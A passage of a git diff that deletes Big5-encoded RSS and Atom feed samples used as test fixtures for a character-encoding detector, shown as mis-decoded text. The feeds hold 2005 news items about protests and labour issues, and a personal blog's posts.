×F®₪Q¦r¸פ₪f-¥ז³q₪½¦@ִ³ֳD®y½ֽ - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108710 - -¬¡°¬yµ{ -®³ר 12.30«e±i¶K -°¨ק ¨ג¥ק ₪@1.2¶}©lµo ₪G1.5·ם₪ׁ - -1.2~1.5 ´M¨D¥״ְ»ֳׂ₪H -¬ש¹A¸פ×u½u¶K ¥H₪־µe¯»µ§ ´M¨D¯}ֳa×F®¶gֳה×ֵ¶¡«~½ט×÷¥₪ג - -1.5 ¥״ְ»×ּ°O×ּ·| - -¬¡°®ֹ¶¡¹w­p¨ג₪p®ֹ 17:00~19:00 - -25₪ְֱִ -¥«¬F¸פ©µ¦ש¬ן¶V×F®×׳ץ¨ֶ¥ף»¡©ת -¶}³ץ ֲ²­n»¡©ת¦¹¦¸¨ֶ¥ף¡B»P¹L¥hֱp¥~¹D¸פ×÷¨ֶ¥ף 5~10₪ְֱִ -¼v¹³¬צ¿‎ ¥­¦w­¶₪גֵ@×F®¡B12.27×÷₪÷¬F³¡¼fִ³... - ±׀¨| - ₪גֵ@×F®ֱp·ש¡B×F®₪j¾ַ«״¿v¨t¬ד¨s©ׂ - 2005-12-30T16:15:53+08:00 - ±׀¨| - - - ִ‏³d¯S°ֿ¬F©²¥¼¦³¥R¨¬ֳׂ¾«e¸v·N°_¶D¡A­n¨D¥¨ט÷M¾P¹ן14¦W¥«ֲ×ּ×÷ְֻ±± - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108723 - ¡@₪µ₪ׁ(12₪כ30₪י)¡A14¦W¦]°ׁ»P§ִ³¥@¶T¥«ֲ¬¡°¦׃¾D¬F©²ְֻ±±×÷₪H₪h¦A«׳´£°ף¡C¥ׁ©ף¯S°ֿ¬F©²₪´µM¥¼¯א´Nְֻ±±´£¨ׁ¥R¨¬×÷ֳׂ¾¡A¥O×k®x¦A¦¸¦A§ג®׳¥ף©ד«ב¦2006¦~1₪כ11₪י(¬P´ֱ₪T)¦A¦¸´£°ף¡C - -¡@¡@¥ֱ¶¡÷¹מ¥@¶Tֱp·שִ‏³d¯S°ֿ¬F©²¡A¦b¥¼¦³¥R¨¬ֳׂ¾₪§«e«K¥^¦£₪־¸v·N¦aְֻ±±¥«ֲ₪H₪h¡A«o¦b®׳¥ף¶}©l₪F×k«µ{§ַ₪§«ב₪@¦A§@¥X©ל©µ¡C»×¾¹D©ׂ¦³³Qְֻ±±×ּ§¡¬O®¥~₪H₪h¡A¬F©²₪@¦A©ל©µ×k«µ{§ַ¡A¥O¥L­ִּ~ִע³Q¹G÷¢¯d­»´ה¡C³o¹ן¥L­ּ¥H₪־¥L­ּ»·¦b®a¶m×÷®a... - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - ­»´ה¥ֱ¶¡÷¹מ¥@¶Tֱp·ש - 2005-12-30T23:14:58+08:00 - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - - - ¥‏²y¥ֱ¶¡×ְ·|­n¨D­»´ה¯S°ֿ¬F©²ְִ©ס§ִ³¥@¶T¥«ֲ×ֱּp¦Xֱn©ת - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108685 - ¡@¡@§­ּ₪D¨׃¦¥@¬ֹ₪£¦P¨₪¸¨×÷₪u·|¡B¹A¥ֱ¡B÷®¥ֱ¡B°₪k¡B©v±׀¡B¾ַ¥ֽ¡B¾ַ³Nµ¥¹־ֵי¡Cֱa¨ֿ§­ּ×÷¦¨­¾ײ¦³₪£¦P×÷»y¨¥¡B½§¦ג¡B÷״±¡B°ךֲַ¡A¦‎§­ּ«o¾ײ¦³¦P₪@÷״«H©ְ¢w¢w₪ֿ¹ן¥@¶T­י«d©M·l®`¥@¬ֹ¦U¦a×÷³ׂ°₪H¥ֱ¡C - -¡@¡@¥@¶T²ִ₪»©¡³¡×ר¯ֵ·|ִ³­ט©ף­»´ה§¹µ²¡A§­ּ§¡¹ן½ֽ§Pµ²×G¥H₪־¡m­»´ה«ֵ¨¥¡n×ם¥¥¢±ז¡C¦P¼ֻ¥O§­ּ¥¢±ז₪־¼««ד×÷¬O¡A­»´ה¬F©²³÷µM₪j³W¼ׂ¦a©כ®·¶W¹L₪@₪d¦W°ׁ»P©M¥­¥«ֲ×÷¥ֱ²³¡A¦׃₪j³¡¥ק³Q©כ¯d₪H₪h¾D¨ל₪£₪H¹D¹ן«¡A¨ה₪₪₪Q¥|¦W¥«ֲ×ּ§ף³Q¬F©²¥H°ׁ»P... - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - ­»´ה¥ֱ¶¡÷¹מ¥@¶Tֱp·ש - 2005-12-29T22:33:41+08:00 - ­»´ה₪ֿWTO³¡×ר¯ֵ·|ִ³ - - - µ״µר₪u·|±ִ³X³q×¾ -₪ֿ¹ן·s»D§½¨Mµ¦²ֱW¦ז° -¡uµ״µר«n¾E¡v×PֵU­₪uֵv¯q»P¹qµר²£·~¸gְח±ר¥ף¡I - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108684 - ¬¡°₪י´ֱ¡G94¦~12₪כ30₪י¡]¶g₪­¡^ -¬¡°®ֹ¶¡¡B¦aֲI¡G₪W₪ָ9®ֹ¥×k°|¸s½ו¼׃(ְ«n¸פ) -·s»Dֱpµ¸¡G±`°ָ²z¨ֶ¡@¦¶¡@«T¡@0921-138-334 -¯µ ®ׁ¡@×L«¶§®¡@0919-125-579¡B02-2775-6977 - -¬Q₪י´ֲ³¥¦U¬Fִׂ´N¡u₪½×ׁ³B²z±ר¨ׂ¯ף®׳¡v¶i¦ז¨ף°׃¡A¹Lµ{₪₪¡A·s»D§½«ְ§½×ר×ם¥₪­¦~₪÷±N§גµ״µר¾E²¾¦«n³¡¥H¥­¿ֵ«n¥_®t²§¡B½ױ¾ד­«¥_»´«n×÷µo®iֱֽ¶ױ¡C¯¸¦b­₪uֵv¯q×÷¥³ץ¡Aµ״µר₪u·|±j¯P₪ֿ¹ן·s»D§½¦¹÷״÷zµר­₪uֱn­µ¡B... - ´Cֵי - ₪₪µ״¹qµר₪½¥q²£·~₪u·| - 2005-12-29T22:30:58+08:00 - ´Cֵי - - - 2005₪Q₪j¹H₪ֿ©ֵv¨ֶ¥ף°O×ּ·| -¢w¢w¹D¼w¶ֳצt×÷¦~¥N¡@©ֵv»}®v¥X©÷¢w¢w - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108676 - ®ֹ¶¡¡G2005¦~12₪כ30₪י¡]₪­¡^₪W₪ָ₪Q®ֹ - -¦aֲI¡G¥x¥_¥«NGO·|ְ]¡]¥x¥_¥««C®q×F¸פ8¸¹¡^ - -¦b¡u©§O¥D¬y₪ֶ¡v×÷©Iֱn÷©₪ׁ¹ֵַT×÷¦¹¨ט¡A©x₪טְִ¥X₪j¶q¸ך·½±ְ°¦U¦¡©§O¥­µ¥¬¡°¡A¦‎¬O¦b³o¨ַ¬¡°₪₪¡A©§O¥u¨£»ר₪ֶ×÷¡u¨k¡v¡u₪k¡v₪G©¡A©ׂ½ֽ×÷ִ³ֳD¥ח¬O¦­₪w¦³¦@ֳׁ×÷¨ג©¥­µ¥»P´L­«¡A¥¼´¿¨£¨ל½ֽ½׳©¥H₪־®z¶ױ©§O¡A©§O¥D¬y₪ֶ₪f¸¹¶ָ¬נֵד¨ה¯U¹i₪÷²[¡C - -¥xֶW×÷©§ִY₪w¸g¦ז₪§₪w₪[¡A¥O₪H¾_ֵו×÷¬O¡A©®_¨מ₪wµM₪@¨B¨B¨מ«׳₪ֶ¡A³z¹Lֵי¨מֱp₪ג¡Aְ£­¢... - ©§O - ©§O₪Hֵv¨ף·|¡B¦P§׃¿װ¸¼צ½u¨ף·|¡B₪ֿ¹ן°²₪ְ¯ֵ¨מ«׳ֱp·ש¡B₪י₪י¬Kֳצֳh₪¬§U¨ף·|¡B¥xֶWTG½÷¶י - 2005-12-29T18:07:30+08:00 - ©§O - - - 1229÷~¥ֽ¯f₪ֽ₪Hֵv¥×k₪½ֵ¥·|·s»D½Z -ֱ÷~¥ֽ₪H₪@­׃₪½¹D¡I¥ֱ¶¡÷¹מ¡A¸¨¹ך¥×k¡A°ך»±µ­y - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108675 - ¥xֶW÷~¥ֽ₪Hֵv¡Bֲוְר¡B¥vֲ¡B₪ו₪ֶ¦@¥ֽ¥×k₪½ֵ¥·|¡Aֵ‎¥x¥_¥«»P¥x¥_¿₪¡A₪£¶ָ¥ז³q±µ­y¡A₪]­n₪ו₪ֶ±µ­y¡A§ף­nֵ‎·s²ר»P¼¬w±µ­y¡Aֵ‎¥xֶW»P¥@¬ֹ₪Hֵv±µ­y¡C - - ·s»D½Zֱpµ¸₪H¡G¸ג»¬w0938 -261069¡B ¿א¿A§g0968-418663¡C¡°¹q¶l: tglhra-office@umail.hinet.net - -₪µ¦~₪C₪כ₪G₪Q₪י¡Aֱp¦X°ך₪Hֵv²ױֲ´µo¥X÷ע«ז₪½³ר¥‏¥@¬ֹ¡I´L÷¼ײ¥ֽ°|¥ֱ¡u¥xֶW÷~¥ֽ¯f₪ֽ¡v©Iֶ~¥x¬F©²₪£¯א­¢¾E¯f₪ֽ¡C³o¬O±q¥ֱ°ך₪»₪Q´X¦~... - 200410¼ײ¥ְֽר¾i°|¾D©מ°£ - ¼ײ¥ֽ«O¯d¦±ֿ·| - 2005-12-29T16:49:36+08:00 - 200410¼ײ¥ְֽר¾i°|¾D©מ°£ - - - ₪ֿ¹ן·s»D§½¨Mµ¦²ֱW¦ז° - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108674 - ¡½¬¡°₪י´ֱ¡G94¦~12₪כ30₪י¡]¶g₪­¡^ -¡½¬¡°®ֹ¶¡¡B¦aֲI¡G₪W₪ָ9®ֹ¥×k°|¸s½ו¼׃(ְ«n¸פ) -¡½·s»Dֱpµ¸¡G±`°ָ²z¨ֶ¡@¦¶¡@«T¡@0921-138-334 - -¯µ®ׁ¡@×L«¶§®¡@0919-125-579¡B02-2775-6977 - -¬Q₪י´ֲ³¥¦U¬Fִׂ´N¡u₪½×ׁ³B²z±ר¨ׂ¯ף®׳¡v¶i¦ז¨ף°׃¡A¹Lµ{₪₪¡A·s»D§½«ְ§½×ר×ם¥₪­¦~₪÷±N§גµ״µר¾E²¾¦«n³¡¥H¥­¿ֵ«n¥_®t²§¡B½ױ¾ד­«¥_»´«n×÷µo®iֱֽ¶ױ¡C¯¸¦b­₪uֵv¯q×÷¥³ץ¡Aµ״µר₪u·|±j¯P₪ֿ¹ן·s»D§½¦¹÷״÷zµר­₪uֱn­µ... - «´¬ש - µ״µר²£·~₪u·| - 2005-12-29T16:47:46+08:00 - «´¬ש - - - ²ִ₪@©¡¥_¨¦P©ֵ₪ו₪ֶ¸`₪½¶}«H - http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID=108673 - 2005¦~12₪כ14₪י¡A§­ּ±µ¨ל¥_¨₪½¦w§½³q×¾¡A₪£³\§­ּ¦b798ְֳ³N°ֿ¶}®i²ִ₪@©¡¥_¨¦P©ֵ₪ו₪ֶ¸`¡C§­ּ¥u¦n¨³³tֲא³ץ¡C©¯ֱ«₪W₪U½u(ON OFF)°s§a₪Q₪ְ₪ה«ש§­ּ¡C©ף¬O¡A2005¦~12₪כ16₪י15®ֹ¡A§­ּ¦b₪W₪U½u(ON OFF)¥¬®i§¹¦¨₪F²ִ₪@©¡¥_¨¦P©ֵ₪ו₪ֶ¸`×÷®iֶU³¡₪ְ¡C¦P®ֹ¡A°s·|§G§½₪]₪w¸g½T©w¡A±₪W×÷¶}¹ץ¦¡¹ֵ»«©M÷q»R±·|×÷÷t­₪]³°ִע¨ל³ץ¨«¥x¡C₪@¨ַ°ך₪÷¥~´Cֵי°O×ּ₪]¬ְ³₪J³ץ¡C¦‎¬O¡A¨¯³ׂ×÷₪½¦w₪zִµ­ּ¥X°ִµ₪O¦A¦¸§ה¨ל§­ּ¡A°ַ¥O... - ©§O - ²ִ₪@©¡¥_¨¦P©ֵ₪ו₪ֶ¸`²ױ©e·| - 2005-12-29T12:42:34+08:00 - ©§O - - - diff --git a/chardet/tests/Big5/digitalwall.com.xml b/chardet/tests/Big5/digitalwall.com.xml deleted file mode 100644 index e757662..0000000 --- a/chardet/tests/Big5/digitalwall.com.xml +++ /dev/null @@ -1,38 +0,0 @@ - - - - -¡m­׃₪H¡D®a®x¡D¼ֶ¦ל₪ֶ - ¼ֶ¦ל₪§ְנ¡n -http://www.digitalwall.com/ -­׃₪H¡D®a®x¡D¼ֶ¦ל₪ֶ - ¼ֶ¦ל₪§ְנ -zh-tw -webmaster@digitalwall.com -Sat, 17 Dec 2005 15:21:36 GMT -Sat, 17 Dec 2005 15:21:36 GMT -http://blogs.law.harvard.edu/tech/rss -720 - -¡m­׃₪H¡D®a®x¡D¼ֶ¦ל₪ֶ - ¼ֶ¦ל₪§ְנ¡n -88 -31 -http://www.digitalwall.com/ -http://www.digitalwall.com/images/digitalwall88x31.gif - - -¦A½ֽ³nֵי»P´Cֵי×÷¨ו½dֲא²¾ -http://www.digitalwall.com/scripts/display.asp?UID=321 -¡·°׃·~³nֵיֲא«¬´Cֵי - -1996¦~₪»₪כ¡Aµ§×ּµo×ם₪ו³¹¡u³nֵי»P´Cֵי×÷¨ו½dֲא²¾¡v¡A₪÷®e¥D­n¬O -ֶ[¹מ¨ל·ם®ֹ×÷³nֵי²£·~¦b¦]ְ³÷פ¸פ¨g¼י×÷±¡×p₪U¡A¶}©l¶ֹ¦V´£¨ׁ§K¶O -³nֵי½ִ¨כ¦w¸ֻ¼ֶ¶q¡]Install Base¡^¡A¨ֲֳא¦׃±q¼s§iְע§Q¡C ... -webmaster@digitalwall.com -¼ֶ¦ל₪÷®e -http://www.digitalwall.com/scripts/display.asp?UID=321 -Sat, 17 Dec 2005 15:21:36 GMT - - - \ No newline at end of file diff --git a/chardet/tests/Big5/ebao.us.xml b/chardet/tests/Big5/ebao.us.xml deleted file mode 100644 index 7e3daf2..0000000 --- a/chardet/tests/Big5/ebao.us.xml +++ /dev/null @@ -1,109 +0,0 @@ - - - - eBao Latest News - http://www.ebao.us - Latest News Stories - zh-TW - Fri, 30 Dec 2005 14:19:19 GMT - Copyright (c) 2005 AmbitUSA Inc. All rights reserved. - editor@ebao.us - - ·s¦~§ײ¼ײ - http://www.ebao.us/portal/showcontent.asp?INDEX=3826 - ¯¬±zׯ¦~¦ז₪j¹B - Fri, 30 Dec 2005 14:19:19 GMT - - - 2006¦~·s­נ₪H¥‏²yµ״₪H·s¦~±·|¡A¥נ₪h¹y¦a°ֱֿ²¼¼צ¯P - http://www.ebao.us/portal/showcontent.asp?INDEX=3832 - 2006¦~·s­נ₪H¥‏²yµ״₪H·s¦~±·|₪w¶}©l°ג²¼ - Thu, 29 Dec 2005 14:19:19 GMT - - - Who¡¦s In Charge of the Public Safety in Shopping Centers!? - http://www.ebao.us/portal/showcontent.asp?INDEX=3831 - My family is able to handle my daughter¡¦s injury and the medical bills. But it¡¦s the stubbornness of the shopping center to not change its inadequate policies and procedures that I find unbearable. - Wed, 28 Dec 2005 14:19:19 GMT - - - Tech Trends to Watch in 2006 - http://www.ebao.us/portal/showcontent.asp?INDEX=3830 - Better than TiVo? These breakout technologies are changing the way we get -- and make -- our entertainment - Tue, 27 Dec 2005 14:19:19 GMT - - - ₪ֹ÷X¨וֲ§±N©ף₪@₪כ₪@₪י₪W₪ָ₪Q®ֱֹ|¦ז - http://www.ebao.us/portal/showcontent.asp?INDEX=3829 - ¼y¯¬₪₪µ״¥ֱ°ך¶}°ך¬צ©ְ÷[₪E₪Q₪­¦~₪¸¥¹¡A¥נ₪h¹y₪₪µ״₪½©ׂ­q©ף₪E₪Q₪­¦~₪@₪כ₪@₪י₪W₪ָ₪Q®ֹ¦b¥נ₪h¹yµ״¹´₪ו±׀×A°ָ₪₪₪«e¼s³ץֱ|¦ז₪¸¥¹₪ֹ÷X¨וֲ§ - Fri, 23 Dec 2005 14:19:19 GMT - - - ¯¬±z¸t½ֿ¸`§ײ¼ײ - http://www.ebao.us/portal/showcontent.asp?INDEX=3827 - ₪µ¦~³ּ»ֵ×÷¸t½ֿ¬y¦ז÷q°- ÷ֶ¨g«Cµל - Wed, 21 Dec 2005 14:19:19 GMT - - - ₪₪°ךֱp¦X®ױ₪ֽ·|·s¦~₪j«¬ֱpֵw±·|¶©­«ֱ|¦ז - http://www.ebao.us/portal/showcontent.asp?INDEX=3823 - ֳh¯S¥«×ר«ֵ¥¬₪₪°ך®ױ₪ֽ₪י¡Aµ״ְA¬wֱ`»ג¨ֶ­Pֳדֳ״÷q¡A¹O₪d·|­¦P¼ײ¡C - - Tue, 20 Dec 2005 14:19:19 GMT - - - ®¥~µ״°׃¯MµH¬ד²¯Z¡A¶}©l±µ¨³ר¦W - http://www.ebao.us/portal/showcontent.asp?INDEX=3824 - ½ׂµ{­q©w₪י´ֱ¬°95¦~2₪כ20₪י¡]¬P´ֱ₪@¡A₪W₪ָ³ר¨ל¡^¦3₪כ10₪י¡]¬P´ֱ₪­¡A₪U₪ָµ²°V¡^½בֲk¡A¬ד²½ׂµ{¦@15₪ׁ¡A¦¥ׁ¬¡°3₪ׁ÷[¡u₪H₪ו×¾©₪§®ָ¡v1₪ׁ¡C - - Tue, 20 Dec 2005 14:19:19 GMT - - - ₪₪°ך®ָ¬±M®a¨ף·|,µ״®L¾ַ₪H¨ף·|ֱp¦Xֱ|¿ל2006¦~×ן·s¦~±·| - http://www.ebao.us/portal/showcontent.asp?INDEX=3822 - ®ָ¬±M®a¨ף·|₪־µ״®L¾ַ₪H­q©ף12₪כ31₪י₪U₪ָ6®ֹ¦bµ״®L₪₪₪ו¾ַ®ױֱ|¦ז¸ף¦~±·| - Tue, 20 Dec 2005 14:19:19 GMT - - - 2006ׯ¦~¹Bµ{ - http://www.ebao.us/portal/showcontent.asp?INDEX=3821 - 2006ׯ¦~¹Bµ{¯S§O×`·N¨ֶ¶µ - Tue, 20 Dec 2005 14:19:19 GMT - - - ₪₪°ך¥ר·~µL­­₪½¥q - http://www.ebao.us/portal/showcontent.asp?INDEX=3820 - ₪₪°ךµS¦p₪@®a¶W₪j«¬¥ר·~¡A×ס₪T₪Q¦~×÷¸gְ¦¨×ר§ײ­n½l³y₪T«׳¥[­¿×÷¬צ¿‎¡K¡K¡A³o¼ֻ±j«l×÷¦¨×ר₪O¹D¥i¿׳«e©ׂ¥¼¨£¡C - Mon, 19 Dec 2005 14:19:19 GMT - §@×ּ/®ץ¼w¡D¶O³·°ׂ Ted C. Fishman - - - ¼w ¦{²ִ₪@»ָ¦ז¸t½ֿ¸`¬£¹ן - http://www.ebao.us/portal/showcontent.asp?INDEX=3819 - »ָ¦ז°e₪jֲ§­₪u¬¶}²´¯÷ - Mon, 19 Dec 2005 14:19:19 GMT - - - 2005×ק¾m¼ת¹{¼ת - http://www.ebao.us/portal/showcontent.asp?INDEX=3817 - ¼צ₪×A°ָ×ְ°ֿ¡A15₪Hְע×ם´­¡C - Sun, 18 Dec 2005 14:19:19 GMT - - - Skype×÷§³Nְu¶ױ¬°¦ף? - http://www.ebao.us/portal/showcontent.asp?INDEX=3814 - §³N¨₪«׳ֲ²­nִִ­zSkype¬°₪°»עְu©ף¶ַ²־×÷VoIP¡BIM³n¥ף¡A¥]¬AP2P§³N¡B¬ן³z¨¾₪ץְנ¡B¦w¥‏¥[±K¡Bֲ²©צ×÷¾§@»P±j₪j×÷¥\¯א¡B¸`¬÷פµ¸¸ך·½¡B¸ף¥­¥x´X­׃₪ט­±¡C - - Fri, 16 Dec 2005 14:19:19 GMT - - - Park 8 ·s₪ׁ¦a¹w°ג¼צ¯P - http://www.ebao.us/portal/showcontent.asp?INDEX=3815 - ¹w­q¬¡°₪~¹L¥h₪­¡A₪»₪ׁ¡A³÷¹w­q₪F×ס¢¸¢¯¦h®M¡A¦­÷´ֱ¥i¥H¹w­q×÷¢´¢¯¢H - Fri, 16 Dec 2005 14:19:19 GMT - - - \ No newline at end of file diff --git a/chardet/tests/Big5/fudesign.blogspot.com.xml b/chardet/tests/Big5/fudesign.blogspot.com.xml deleted file mode 100644 index 1dfcc39..0000000 --- a/chardet/tests/Big5/fudesign.blogspot.com.xml +++ /dev/null @@ -1,160 +0,0 @@ - - - - - - -FU'S BLOG - - -tag:blogger.com,1999:blog-7699473 -2005-12-30T10:01:43Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Keng-Fu - -2005-12-24T00:41:00+08:00 -2005-12-30T10:01:43Z -2005-12-23T16:51:40Z - -tag:blogger.com,1999:blog-7699473.post-113535670049182402 -·Pֱֲ¦A·Pֱֲ~~·m±ֿPSP~! -<img src="http://www.fu-design.com/blog/pic/051224kinman.jpg"><br /><br /><span class="fullpost"><br />ֵ¥»¡²¼¿ן²ִ₪@¦W¦³PSP¡A¦p×G§A¦¬¨ל­C½ֿICASH«¶}₪¡A¦p×G§A¬OFU×÷¦÷©¾FANS¡A¦p×G§A₪]³ֵw¦Y¿N¦׳ֱ¦³¥V₪ׁ·|»ף¶כ¡A¨÷₪׃´־₪F¡I§­ּ¯u¬O¦³½t©ׂ¥H¨׃§כ²¼§a¡I¨C₪ׁ¥i¥H§כ₪@±i³ב¡I<br /><br /><a href="http://www.heyshow.com/activity/Vote.asp?id=16276" target=_blank>KINMAN IN KINMEN http://www.heyshow.com/activity/Vote.asp?id=16276</a><br /><br />¨÷¡Aֱ`₪§¡A«פ°U₪j®a₪F~~~~~!<br /><br /><a href="http://www.heyshow.com/activity/browsing.asp?actid=27" target=_blank>¾װ×phttp://www.heyshow.com/activity/browsing.asp?actid=27</a><br /></span> -false - - - - -Keng-Fu - -2005-12-20T11:41:00+08:00 -2005-12-20T10:20:17Z -2005-12-20T04:05:04Z - -tag:blogger.com,1999:blog-7699473.post-113505150423012269 -MERRY XMAS¡I -<img src="http://www.fu-design.com/blog/pic/051220xmasbug.jpg"><br /><span class="fullpost"><br />¨S·Q¨ל²ִ₪G§וICASH³÷µM°µ¦n₪F¡A¥»¨׃¸¹÷­n°µ14₪ׁ×÷7-11¹y®ֵֹ‎§¨ם¥״¬¬¡A²׳©ף¥i¥H»°¦b­C½ֿ¸`«e§ג©ׂ¦³×÷°׃«~³£±H¥X¥h₪F¡Aֳצ©ף³o¥קICASH×÷₪÷§t׫¥i¥H¨£<a href="http://www.wretch.cc/blog/iamryan" target=_blank>°h¥מ¹p®¦RYAN₪j§L</a>×÷BLOG¡A¦hֱ«¦³§A³o½g₪¶²׀§₪£¥־¦A¥´₪@¦¸₪F­C­C!<br /><br />×‏±a₪@´£×÷¬O¥L×÷­I´÷­µ¼ײ«¦nֵ¥,<br /><br />¦A¨׃§×÷¾ַ©n<a href="http://myblog.pchome.com.tw/zoe_sui1980" target=_blank>¬½ְY</a>¦b¥x«n¶}₪F₪@®a«¥ׂ±mֳ¸©±¡A¬¨ל¸¨¦¨×÷·׃₪ש³s§₪£¸T³£·P°°_¨׃¡A₪J×ׁ×÷¬ץ§Qְ³¸׃¬O¦³±ז₪F«¢¡I§­n§ה®ֹ¶¡¦n¦n₪U¥x«n¥h³}₪@³}¡A₪j®a₪]³£­n¯d«¥ׂµ¹§¾ַ©nµe³ב¡I¡I<br /><br />¦A¦A¨׃¦A¼s§i₪@₪U¦n₪ֽPUMA×÷<a href="http://www.aevoe.com/shop/" target=_blank>AEVOE₪½¥q</a>©ׂ¥ֽ²£×÷¦U¶µ3C²£«~¡A¥i¬O¦³½ז¨ל¬­x¯ט×ֵ¥ְֵ²₪W³ב¼F®`§a¡I«~½ט«D±`´־₪@©w­n¨׃³}³}¡I<br /><br />¦p×G¦Y¹¡₪׃¶¢×÷×B₪ֽ₪]¥i¥H¨׃¬¬¨׃¦×®®x₪ֽ₪H²ױ₪F₪@­׃band×÷MV¡A«D±`×÷µLֽשְY¸ע¬₪£ְ´¡A¦׃¥B§₪]₪£×¾¹D¬°¬ֶ»ע­n±Hµ¹§¦‎¬O«¦³½ל¡A₪§«e§ֱ¦¬¹L₪@­׃¦L«׳¾ַ¥ֽ­n¨׃ְ³¼x×÷email¡A³o÷״°ך»₪ֶ¯u¬O²צ¦W¨ה§®×¡I¡I¡u<a href="http://www.maumaweb.com.ar/cybergeisha320x240.mov" target=_blank>Soy como vos¡v</a>¨׃²q²q³o¥y¸¬O¬ֶ»ע·N«ה§a¡I<br /><br />©ת¦~¦³«¦h­p¹÷¡A²ִ₪@×i¥D¥´¥i¯א¬O³o°¦ֲ־₪S­nֵ¦¨¬ץ¥]³U₪F¡A½׀­@₪µ¥«¡I(¦]¬°§₪]ֱ¨S¶}©lµe)<br /></span> -false - - - - -Keng-Fu - -2005-12-14T16:08:00+08:00 -2005-12-14T08:17:46Z -2005-12-14T08:16:25Z - -tag:blogger.com,1999:blog-7699473.post-113454818546103616 -ֱ¬O¨׃±₪F!HAPPY BIRTHDAY! -<img src="http://www.fu-design.com/blog/pic/051214rakuda.jpg"><br /><br />³J¿|×÷₪f¨‎¬O¶ֲ´ֻ×L¡A<br /><span class="fullpost"><br /><br />ֱצµM§₪@×½¦³¦b°O¡A¥i¬Oֱ¬O₪µ₪ׁ¸I¨ל³¢«״®ֹ₪~·Q°_¨׃¡A÷¡©P·³§ײ¼ײסI¡I³¢«״¡I¡I<br /><br />³¢«״₪]¬O´¡µe®a¡A¸װ¨£<a href="http://spirit-hole.blogspot.com/" TARGET=_BLANK>http://spirit-hole.blogspot.com/</a><br /><br />ֳצ©ף³¢«״×÷¥ֽ₪יֳ״¹ֿ¥i¨£<a href="http://fudesign.blogspot.com/2005/08/august-8.html">³o½g</a><br /><br />₪µ₪ׁ²׳©ף¦³¾ק·|µe₪@±iµ¹§A₪]÷ג₪F₪F§₪@­׃₪ִ@סI¡I¡I<br /><br />ֱצµM»{¯u¨׃»¡§₪£₪׃²M·¡§A¬O25ֱ¬O26·³₪F¡A¨Sֳצ«Y§­ּ´N·ם¬O¥ֳ»·×÷25·³§a¡C<br /><br />¥ֽ₪י§ײ¼ײ!!¦n¥S§ּ¡I¡I<br /><br /></span> -false - - - - -Keng-Fu - -2005-12-08T10:45:00+08:00 -2005-12-11T13:44:58Z -2005-12-08T02:59:55Z - -tag:blogger.com,1999:blog-7699473.post-113401079541461846 -₪פµk÷µ÷[FU ICASH¥d -<table border="0" cellpadding="3" bgcolor="#FFFFFF"><tr><td><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="405" height="320"><br /> <param name="movie" value="http://www.fu-design.com/blog/pic/051204.swf"><br /> <param name="quality" value="high"><br /> <embed src="http://www.fu-design.com/blog/pic/051204.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="405" height="320"></embed></object><br /></td></tr></table><br /><br />«z!ִר×ב×÷₪פµk÷µ­C¡I<br /><span class="fullpost"><br />³o¬O₪@±i¯ֲ÷י­nֳׂ©תFLASHµe«§ײ×÷¹ֿ,₪W¶g₪יµL§ְ÷µ₪־¨ה₪ֽ₪H¨׃¥x₪₪¡A©ׂ¥H²{³ץ´NְH₪ג®³ִר×ב×÷₪פµk÷µ×ם÷t₪@₪UFLASH¬O«ח»עµe¹ֿ×÷¡A₪j·§µe₪F₪Q₪ְֱִ§a¡Aְֻ₪ט­n¨D¶ַ³ךֳׂ₪HµL§ְ÷µ¡C<br /><br />₪£¹L¦A¦¸¸ע¦¹½g₪ו³¹§¹¥‏µLֳצ×÷¨ֶ¡A´N¬O§­ּ¨׃½T»{₪@₪UICASH¦W³ז§a¡I<br />ICASH´X¸g×i§י¡Aֱ`÷ג¬O§ײ®³¨ל₪F¡A<br />¸װ¨£¡uFU»P¥L×÷¥ת©ַ³°ֲק´¡µe₪§¸פ¡v(¥¼¥Xש)¡A<br /><br />¥H₪U¬O­qֱ¦W³ז×÷:<br />₪p±d x 2<br />intro x 1<br />ryan x 1<br />¦ּ¨ה x 1<br />³½¥‎¥ֽ x 1<br />¬מ x 1<br />₪p¥¬ x 1<br />¦ד®´ֻ x 1<br />joart x 3<br />mingi x 1<br />₪u³]₪p±d x 2<br />×צֱ¨ x 2<br />JuJu x 1<br />milla x 1<br />₪pD x 1<br />didi x 2<br />ִר×ב x 1<br /><br />³o¦¸×÷¥]¸ֻ«D±`×÷ֲ׳´I,<br />ֱ¦³÷כ³(´N¬O÷כ¬₪S³ֵw×÷)©ת«H₪ש,·Pֱֲ₪j®a×÷¾ײֵD·mֱ,<br />§ֶ±ז¯א¦b³o­׃ֲ§«פµ¹§¦a§}³ב,ֲא±b×÷©ת²׃§·|²־₪@±H×÷,ֱֱֲֲ₪j®a!!<br /><br /></span> -false - - - - -Keng-Fu - -2005-11-16T20:34:00+08:00 -2005-11-16T15:22:38Z -2005-11-16T13:31:55Z - -tag:blogger.com,1999:blog-7699473.post-113214791527197963 -Recently Good Stuff -<img src="http://www.fu-design.com/blog/pic/051116recently.jpg"><br /><br /><span class="fullpost"><br />³o₪@½g¬O¦n׫₪jֲר¶׳¡A­^°ך¦זֱ¬O¦³ִ~ִע×÷¡A₪£¹L¦]¬°³ּ×ס¦¬¨ל₪F«¦h¦n×F¦ט¡A¦A₪£¨׃³ר₪@₪U´N÷¡¥X¨׃₪F¡A¦n¡A­n¶}©l₪F¡I¡I<br /><br /><img src="http://www.fu-design.com/blog/pic/051116PDR_2080.jpg"><br /><br 